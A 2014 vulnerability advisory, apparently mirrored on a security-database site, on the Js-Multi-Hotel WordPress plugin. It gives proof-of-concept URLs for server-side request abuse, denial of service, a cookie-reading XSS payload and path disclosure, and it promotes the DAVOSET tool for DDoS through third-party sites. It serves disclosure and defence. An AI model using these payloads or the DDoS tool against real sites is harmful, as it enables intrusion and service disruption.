Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30606
HistoryMay 04, 2014 - 12:00 a.m.

Multiple vulnerabilities in Js-Multi-Hotel for WordPress

2014-05-0400:00:00
vulners.com
31
JSON

Hello 3APA3A!

There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. Earlier I wrote about two other vulnerabilities.

These are Abuse of Functionality, Denial of Service, Cross-Site Scripting and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for WordPress. There are much more vulnerabilities in this plugin (including dangerous holes), so after two advisories I'll write new advisories.

Affected products:

Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

Affected vendors:

Joomlaskin
http://www.joomlaskin.it

Affected products:

Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

Details:

Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1

DoS (WASC-10):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1

Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

DDoS attacks via other sites execution tool: http://websecurity.com.ua/davoset/

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E

About XSS vulnerability in refreshDate.php in parameter roomid there was written earlier (http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/functions.php

http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php

http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=

http://site/wp-content/plugins/js-multihotel/includes/show_image.php

http://site/wp-content/plugins/js-multihotel/includes/widget.php

http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php

http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php

I wrote about these vulnerabilities at my site (http://websecurity.com.ua/7087/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON